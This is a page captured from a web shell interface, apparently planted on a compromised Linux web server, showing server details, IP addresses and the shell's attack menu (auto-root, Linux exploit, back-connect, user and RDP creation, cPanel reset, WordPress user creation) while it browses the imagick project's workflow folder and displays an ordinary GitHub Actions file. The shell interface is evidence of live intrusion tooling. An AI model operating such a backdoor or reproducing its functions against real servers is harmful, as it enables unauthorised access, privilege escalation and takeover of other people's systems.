Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
imagick /
.github /
workflows /
[ HOME SHELL ]
Name
Size
Permission
Action
main.yml
6.53
KB
-rw-r--r--
release_validate.yml
823
B
-rw-r--r--
windows.yml
1.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : windows.yml
name: Build and Test on Windows on: push: pull_request: release: types: [created] jobs: get-extension-matrix: runs-on: ubuntu-latest outputs: matrix: ${{ steps.extension-matrix.outputs.matrix }} steps: - name: Checkout imagick uses: actions/checkout@v5 - name: Get the extension matrix id: extension-matrix uses: php/php-windows-builder/extension-matrix@v1 with: php-version-list: '7.4, 8.0, 8.1, 8.2, 8.3, 8.4, 8.5' windows: needs: get-extension-matrix runs-on: ${{ matrix.os }} strategy: fail-fast: false matrix: ${{fromJson(needs.get-extension-matrix.outputs.matrix)}} steps: - name: Checkout imagick uses: actions/checkout@v5 - name: Build the extension uses: php/php-windows-builder/extension@v1 with: php-version: ${{ matrix.php-version }} arch: ${{ matrix.arch }} ts: ${{ matrix.ts }} libs: ImageMagick-7 test-workers: 4 release: runs-on: ubuntu-latest needs: windows if: ${{ github.event_name == 'release' }} steps: - name: Upload artifact to the release uses: php/php-windows-builder/release@v1 with: release: ${{ github.event.release.tag_name }} token: ${{ secrets.GITHUB_TOKEN }}
Close